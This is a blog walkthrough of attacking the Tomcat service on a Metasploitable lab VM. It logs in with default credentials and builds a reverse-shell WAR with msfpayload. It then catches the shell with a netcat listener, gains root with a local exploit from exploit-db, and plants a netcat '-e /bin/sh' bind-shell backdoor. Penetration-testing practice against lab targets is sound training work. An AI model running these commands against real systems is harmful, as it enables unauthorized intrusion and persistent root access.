Metasploitable Series – Tomcat

In this episode we are going to take a look at the Tomcat Service on our Metasploitable Box.

Lets start with a Nmap scan…

1409539753_thumb.png
So we can see on port 8180 we have Tomcat running…  Lets take a look at it…

As we can see the Tomcat manager requires a login.  I know that by default the username and password is ‘tomcat’ lets try that.

we have logged into the manager application!  Lets now take a look at generating a reverse shell!

msfpayload linux/x86/shell_reverse_tcp RHOST=172.16.28.245 LPORT=4444 W > myshell.war

^^^ This will generate our .WAR file which is an Apache Tomcat module.

Metasploit uses a random string for the .jsp page that is called in the war file…  To find that we can extract the war file before we upload it.

As we can see ktipihbvrq.jsp is our .jsp filename.  The syntax to extract this file is jar -xf <WAR file name>

172.16.28.248:8180/myshell/ktipihbvrq.jsp

^^^  This URL will kick off our reverse shell…  Lets start up a listener…

nc -lvp 4444

^^^ Starts our netcat listener.

1409539804_full.png
As you can see we now have a shell as tomcat55!

Lets run a tool called LinuxPrivChecker.py

So Linux Priv Checker tells us that http://www.exploit-db.com/exploits/8572/ is a good candidate to get us root.  Lets try it out by following what the comments tell us to do with it…

First I will compile it.  (My machine and the target are both x86 32bit)

so now that I used gcc 8572.c -o 8572 to compile the exploit, and I uploaded it.  Lets pass it what was requested…

BUT first we need to create a run file like the says in the comments.  <– This is why it is important to read all the info before starting to play with an exploit.  Comments are gold when working with someone else’s code.

For this I am just going to create a simple netcat bind shell

echo “#!/bin/sh”>run

echo “/bin/netcat -lvp 4447 -e /bin/sh” >>run

Again this is why reading the comments is important.  If you read it you see it says “usually minus 1” in our case it was not minus 1 it worked with the exact PID.

1409539861_full.png
1409539875_thumb.png
1409539887_thumb.png
1409539912_thumb.png

And we have root!

As you can see we connected from our attacking box to the new bindshell.  Because this was a local root exploit the script we created on /tmp/run was executed as root giving us a simple netcat root backdoor on port 4447.

Hope you enjoyed the video!  Send feeback to feedback@overflowsecurity.com

-Justin (Eagle11)

Leave a Reply

Your email address will not be published. Required fields are marked *

The opinions and thoughts on this blog are those of Overflow Security members, and do not reflect those of our members employers.